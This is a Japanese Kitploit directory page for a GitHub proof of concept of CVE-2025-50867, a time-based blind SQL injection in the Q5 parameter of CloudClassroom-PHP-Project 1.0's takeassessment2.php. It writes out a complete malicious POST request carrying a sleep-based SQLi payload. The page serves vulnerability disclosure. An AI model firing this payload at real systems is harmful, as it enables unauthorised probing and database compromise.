Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-50867 — CloudClassroom-PHP-Project 1.0 の takeassessment2.php エンドポイントにおける時間ベースのブラインドSQLインジェクション脆弱性の概念実証で、細工されたPOSTリクエストによるリモート悪用を示します。 | Kitploit
ツール/GitHubGitHub/sacx-7/cve-2025-50867
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストデータベースセキュリティ
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

CloudClassroom-PHP-Project 1.0 の takeassessment2.php エンドポイントにおける時間ベースのブラインドSQLインジェクション脆弱性の概念実証で、細工されたPOSTリクエストによるリモート悪用を示します。

リポジトリを見る
121年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CloudClassroom-PHP-Project 1.0 の takeassessment2.php エンドポイントに SQL インジェクションの脆弱性が存在します。この脆弱性では、Q5 POST パラメータがサニタイズされずに SQL 文に直接埋め込まれます。


脆弱性タイプ :

SQL Injection


提供元 :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


影響を受ける製品コードベース :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


影響を受けるコンポーネント :

takeassessment2.php, Q5 POST パラメータ, SQL クエリロジック


攻撃タイプ : リモート

攻撃ベクトル :

この脆弱性を悪用するには、攻撃者は /CloudClassroom-PHP-Project-master/takeassessment2.php に対して、Q5 パラメータに SQL 処理で時間遅延を引き起こすペイロード(ブラインド時間ベースの SQLi)を含む悪意のある POST リクエストを送信します。

POST リクエスト:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= これにより、レスポンスに6秒の遅延が発生し、脆弱性が確認されます。


参考 :

https://owasp.org/www-community/attacks/SQL_Injection


発見者 : saurabh solanki

LinkedIn : https://www.linkedin.com/in/saurabh-b294b21aa/

ツールをダウンロード